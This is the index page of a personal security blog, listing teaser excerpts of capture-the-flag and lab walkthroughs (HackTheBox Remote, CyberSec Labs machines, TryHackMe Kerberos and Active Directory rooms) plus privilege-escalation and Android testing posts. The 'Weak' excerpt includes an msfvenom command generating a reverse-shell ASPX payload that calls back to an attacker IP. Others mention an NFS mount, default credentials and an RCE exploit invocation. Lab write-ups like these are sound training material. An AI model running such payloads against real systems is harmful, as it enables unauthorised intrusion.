MYSTIKO

Secrets are meant to be secret

Hackthebox – Remote

Summary Mount the NFS Get the SHA1 hash from .sdf file Crack the hash with John Get the RCE Exploit Capture user.txt Run winpeas Found vulnerability on UsoSvc Escalate to Administrator with UsoSvc Get reverse shell as Administrator Capture root.txt… Continue Reading →

Weak

172.21.1.1 CyberSec Labs Weak Walkthrough FTP anonymous login allowed upload shell.aspx rev shell and get a shell      msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f aspx > shell.aspx http://172.31.1.11/shell.aspx Priv Esc Running whoami /priv we get SeImpersonatePrivilege token enabled So a… Continue Reading →

CMS

172.31.1.8 Cybersec Labs CMS Writeup Another wordpress site Running WPscan we find /uploads directory Which has a screenshot of an id_rsa file’s location which is in /home/angel/.ssh/id_rsa also wpscan shows twenty twenty theme vulnerable but cant find anything But there’s… Continue Reading →

Shares

172.31.1.7 CyberSec Labs Shares Walkthrough. As the name itself suggest, it has an nfs share open Looks like /home/amir can be mounted to our machine Using mount –t nfs 172.31.1.7:/home/amir  /tmp/shares/ we mount the amir share to our machine’s /tmp/shares/… Continue Reading →

Engine

172.31.1.16 CyberSec Labs Engine Walkthrough Port 80 open Gobuster finds a directory /blog It is blogengine cms which is not configured properly and has default creds admin:admin There’s an RCE exploit available for the same Python exploit.py –t 172.31.1.16/blog –l… Continue Reading →

Attacking Kerberos

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play  Tryhackme’s Attackingkerberos athttps://tryhackme.com/room/attackingkerberos[Task 1] Introduction This room will cover all of the basics of attacking Kerberos the windows ticket-granting service; we’ll cover the following:… Continue Reading →

The art of gaining root

Hi Guys, This is my First blog about Linux Privilege escalation. So Without wasting any time Let’s Start I’ll start with basics. So, /* WHAT IS LINUX AND PRIVILEGE ESCALATION? */ 1. Linux -: Linux is the best-known and most-used… Continue Reading →

Tryhackme – Blueprint

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play Blueprint at  https://tryhackme.com/room/blueprint “Do you have what is takes to hack into this Windows Machine?” Enumeration As always we start with a nmap… Continue Reading →

Attacktive Directory – Try Hack Me

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play Attacktive Directory at Challenge Task 1 Initiate the VPN connection and deploy the machine Task 2 -> Impacket Install Impacket, this is a… Continue Reading →

Android Penetration Testing: Creating Rooted AVD in Android Studio

Setting up Android testing environment if you’re looking for a platform other than Genymotion For a security enthusiast, a rooted android device is essential to perform dynamic assessments of android applications. They either rely on a physical device, or a… Continue Reading →

« Older posts

© 2020 MYSTIKO — Powered by WordPress

Theme by Anders NorenUp ↑